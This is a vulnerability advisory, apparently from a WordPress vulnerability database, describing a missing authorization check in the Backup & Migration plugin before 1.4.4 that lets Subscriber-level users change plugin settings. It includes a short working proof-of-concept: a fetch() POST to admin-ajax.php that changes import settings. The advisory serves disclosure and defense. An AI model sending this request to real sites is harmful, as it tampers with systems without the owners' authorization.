Lucene search
Krzysztof Zając (CERT PL)WPVDB-ID:C761C67C-EAB8-4E1B-A332-C9A45E22BB13HistoryNov 06, 2023 - 12:00 a.m.
WordPress Backup & Migration < 1.4.4 - Subscriber+ Plugin Settings Update
2023-11-0600:00:00
Krzysztof Zając (CERT PL)
wpscan.com
4
wordpress
backup
migration
plugin
authorization
ajax
security
vulnerability
low role.
Description The plugin does not authorize some AJAX requests, allowing users with a role as low as Subscriber to update some plugin settings.
PoC
fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded; charset=UTF-8”, }, “body”: “settings_data%5Bim_data_size_per_req%5D=100&settings;_data%5Bim_db_file_per_req%5D=200&action;=mgdp_plugin_save_import_settings”, “method”: “POST”, “mode”: “cors”, “credentials”: “include” }); Open http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import and click on Advanced Options to see the updated settings.
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 1.4.4 |
Related
wpexploit
wpexploit
WordPress Backup & Migration < 1.4.4 - Subscriber+ Plugin Settings Update
2023-11-06 00:00:00
nvd
nvd
CVE-2023-5737
2023-11-27 17:15:09
prion
prion
Design/Logic Flaw
2023-11-27 17:15:00
cve
cve
CVE-2023-5737
2023-11-27 17:15:09
cvelist
cvelist
wordfence
wordfence
5 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
14.0%
Related for WPVDB-ID:C761C67C-EAB8-4E1B-A332-C9A45E22BB13